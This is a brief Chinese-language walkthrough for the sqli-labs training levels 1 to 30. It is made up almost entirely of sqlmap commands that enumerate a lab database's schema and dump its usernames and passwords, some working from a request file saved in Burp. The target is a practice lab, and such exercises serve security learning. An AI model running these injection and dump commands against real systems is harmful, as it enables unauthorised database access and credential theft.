sqli1到9关爆破
因为步骤都是一样的,我只演示第一关
- 爆出数据库名
- python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql --batch --dbs
- 爆表名
- python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql -D security --tables --batch
- 爆字段名
- python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql -D security -T users --columns --batch
- 爆用户信息
- python sqlmap.py -u http://192.168.188.10/sqli/Less-1/?id=1 --technique UE --dbms mysql -D security -T users -C username,password --dump --batch
- 没了
sqli10关爆破
第十关与之前的区别是需要设置风险级别以及测试级别
- 爆破数据库
- python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i --dbs --batch --level=5 --risk=3
- 爆表名
- python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i -D security --tables --batch --level=5 --risk=3
- 爆字段名
- python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i -D security -T users --columns --batch --level=5 --risk=3
- 爆用户信息
- python sqlmap.py -u http://192.168.188.10/sqli/Less-10/?id=i -D security -T users -C username,password --dump --batch --level=5 --risk=3
- 没了
sqli11到19关爆破
因为步骤都是一样的,我只演示第十一关
- 使用BURP保存数据包到本地,命名为11.txt
- 爆破数据库
- python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql --batch --dbs
- 爆表名
- python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql -D security --tables --batch
- 爆字段名
- python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql -D security -T users --columns --batch
- 爆用户信息
- python sqlmap.py -r “C:\Users\User\Desktop\11.txt” --technique UE --dbms mysql -D security -T users -C username,password --dump --batch
- 没了
sqli20到30关爆破
与上面一样只是后面加个风险等级以及测试等级就行
就是加--level=5 --risk=3